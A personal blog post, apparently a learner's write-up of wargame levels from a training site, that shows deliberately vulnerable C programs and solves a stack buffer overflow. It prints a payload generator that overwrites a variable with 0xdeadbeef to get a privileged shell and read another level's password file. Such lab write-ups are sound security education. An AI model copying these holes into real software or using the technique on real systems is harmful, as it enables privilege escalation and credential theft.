Marc Barilley

I found something on the net but it’s written in Korean. Which I don’t speak…
There’s some asm code in there and I’m trying to understand what it does. I’m still learning and, as soon as I have a clue on how this works, I’ll tell it here. See you soon…

The source

#include <stdio.h>
#include <stdlib.h>

int main(){
 int (*ret)();

 if((ret=getenv("EGG"))==NULL){
 printf("Give me something to execute at the env-variable EGG\n");
 exit(1);
 }

 printf("Trying to execute EGG!\n");
 seteuid(1003);

 ret();

 return 0;
}

Simple, is it? Just put some the address of some executable code in the env var EGG. No… not that simple. The code must be there too.

This is the source:

#include <stdio.h>
#include <stdlib.h>

int main(){
 long val=0x41414141;
 char buf[20];

 printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
 printf("Here is your chance: ");
 scanf("%24s",&buf);

 printf("buf: %s\n",buf);
 printf("val: 0x%08x\n",val);

 if(val==0xdeadbeef){
 seteuid(1002);
 system("/bin/sh");
 } else {
 printf("WAY OFF!!!!\n");
 exit(1);
 }

 return 0;
}

So, what’s the point? Overwrite the value of the variable val. Ok. This seems pretty easy: there are two variables used in the program. The compiler will place them on the stack, one after another. Writing in buf, past its length, will naturally override val. This is it! The proof by the example: run the program /wargame/level1 and type 000000000000000000001234. Notice that the value of val (0×41414141) has changed to 0×34333231.

Ask me why I choose this string. Because buf is 20 bytes long. These are the first 20 zeros of the string. And val is a long, which is 4 bytes. What we have to do is then find the 4 characters that will turn 0×41414141 into 0xdeadbeef.

The tricky part is how to do that. 0xde, 0xad and so on are not always available on keyboards (at least, my French one). I then wrote and compiled a little program that display these characters and copied/pasted them. Here it is:

#include <stdio.h>

int main (int argc, char *argv[])
{
unsigned long l=0xdeadbeef;
char *p=(char*)&l;
int i;
printf("aaaaaaaaaaaaaaaaaaaa");
for (i=0; i < 4; i++)
 printf("%c", p[i]);
return 0;
}

Some explanations: l is a long with the hex values of the chars I want to display. I need a pointer to a char, p, to iterate throw the bytes. It initially points to l. This why l needs to be casted to a (char *). Because I’m lazy, the program prints 20 a before the 0xdeadbeef characters.

I ran it, copied/pasted and got suid’ed. I cat’ed /home/level2/.passwd and logged in as level2.

I’m in. Something I neglected the past years: security in programs. I mean, the kind of security holes one may find deeply buried in the code. Because I’m no more in compiled languages since a bunch of years now, I didn’t really paid attention to these points. Generally, the virtual machines my programs run in take care of these points.

So, I asked one of my colleagues who works at the Security here to point me to some exercises. He gave me this link: www.intruded.net. I went there and began the wargames.

The principle is quite simple: you run a program located at /wargame and it displays what has to be done to crack it. The source code is available. All you have to do is read it, find the hole and dive into it.